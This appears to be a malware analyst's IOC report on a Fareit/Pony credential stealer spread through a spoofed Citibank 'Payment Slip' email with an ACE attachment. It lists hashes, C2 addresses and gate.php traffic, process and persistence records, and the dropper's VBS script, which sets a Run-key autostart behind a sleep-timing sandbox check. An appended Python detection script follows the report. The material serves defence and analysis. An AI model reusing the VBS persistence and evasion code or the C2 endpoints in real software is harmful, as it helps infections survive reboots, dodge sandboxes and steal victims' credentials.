VRad

#Fareit_181018

Oct 19th, 2018
#IOC #OptiData #VR #Pony #Fareit #ACE

https://pastebin.com/u0D14L5r
FAQ:
https://radetskiy.wordpress.com/?s=fareit

attack_vector
--------------
email attach (ace) > exe > %temp%\subfolder\filename.exe

email_headers
--------------
Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
(envelope-from spoof@citicorp.com)
Received: from webmail.edwise.pk (localhost [IPv6:::1])
by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
Date: Thu, 18 Oct 2018 10:44:02 +0100
From: CITIBANK <spoof@citicorp.com>
To: undisclosed-recipients:;
Subject: Payment Slip - Payment remitted 15/10/2018
X-Sender: spoof@citicorp.com
User-Agent: Roundcube Webmail/1.3.6

email_subjects
--------------
Payment Slip - Payment remitted 15/10/2018

files
--------------
SHA-256 ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
File name Payment slip.ace
File size 264.85 KB

SHA-256 3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
File name Kakih > %temp%\subfolder\filename.exe
File size 618.27 KB

activity
**************

netwrk
--------------
194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
67.227.226.240 pornhouse.mobi GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

comp
--------------
[System Process] 0 TCP 194.36.173.171 80 TIME_WAIT
filename.exe 2160 TCP 67.227.226.240 80 ESTABLISHED

proc
--------------
"C:\Users\operator\Desktop\Payment slip.exe"
"C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
"C:\tmp\subfolder\filename.exe"
"C:\tmp\subfolder\filename.exe"
C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\7710921.bat" "C:\tmp\subfolder\filename.exe" "

vbs
--------------
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
Vbs ="C:\tmp\subfolder\filename.vbs"
' First run (no arguments): register the script in the Run key, but only if a
' real 5-second sleep elapsed; a sandbox that skips Sleep fails this check.
If WScript.Arguments.Count = 0 Then
GG = second(now)
WScript.Sleep 5000
VV = second(now)
Vbs = Vbs & " -FF"
If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
WScript.Quit
end if
' Later runs (started from the Run key with -FF): launch the dropped payload.
WshShell.Run """C:\tmp\subfolder\filename.exe"""

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:32
Registry Key Name c:\tmp\subfolder\filename.vbs 18.10.2018 17:32

drop
--------------
C:\tmp\subfolder\filename.exe
C:\tmp\subfolder\filename.vbs

# # #
https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5

Harvests credentials from local FTP client software
Harvests information related to installed mail clients
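Added example, not part of the original paste: a Python triage script run over constructed records modelled on this report's proc, persist and netwrk sections. It flags process launches and Run values that reference files staged under a temp directory (the pattern the VBS above uses for filename.vbs) and HTTP requests carrying the legacy User-Agent seen in the netwrk section; the benign OneDrive Run value, the second HTTP line and the list of temp locations are assumptions added here.

```python
import re

# Constructed sample records, modelled on the proc, persist and netwrk sections
# of this report. The OneDrive Run value and the second HTTP line are benign
# decoys added here so the checks have something to leave alone.
PROC_LINES = [
    r'"C:\Users\operator\Desktop\Payment slip.exe"',
    r'"C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"',
    r'"C:\tmp\subfolder\filename.exe"',
    r'C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\7710921.bat" "C:\tmp\subfolder\filename.exe" "',
]
RUN_KEYS = {  # HKCU\...\CurrentVersion\Run value name -> data
    "Registry Key Name": r"c:\tmp\subfolder\filename.vbs",
    "OneDrive": r"C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}
HTTP_LINES = [
    "194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)",
    "203.0.113.5 example.org GET /index.html HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

# Writable staging directories (assumed list of %temp%-style locations).
TEMP_DIR = re.compile(r"(?i)^[a-z]:\\(tmp|temp|windows\\temp|users\\[^\\]+\\appdata\\local\\temp)\\")
SCRIPT_EXT = re.compile(r"(?i)\.(vbs|vbe|js|jse|wsf)(\s|$)")
PONY_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"  # UA from the netwrk section

def suspicious_paths(cmdline):
    """Return every Windows path in a command line that sits under a temp directory."""
    quoted = re.findall(r'"([a-zA-Z]:\\[^"]+)"', cmdline)
    bare = re.findall(r'(?<!")([a-zA-Z]:\\\S+)', cmdline)
    return [p for p in quoted + bare if TEMP_DIR.match(p)]

def check_processes(lines):
    """Process launches that execute or reference a binary or script from a temp dir."""
    return [line for line in lines if suspicious_paths(line)]

def check_run_keys(run_keys):
    """Run values that point at a script file or at anything staged in a temp dir."""
    return [name for name, data in run_keys.items()
            if SCRIPT_EXT.search(data) or suspicious_paths(data)]

def check_http(lines):
    """Outbound requests carrying the legacy User-Agent used by this sample."""
    return [line for line in lines if PONY_UA in line]

if __name__ == "__main__":
    for label, hits in (("proc", check_processes(PROC_LINES)),
                        ("persist", check_run_keys(RUN_KEYS)),
                        ("netwrk", check_http(HTTP_LINES))):
        print(label, hits)
```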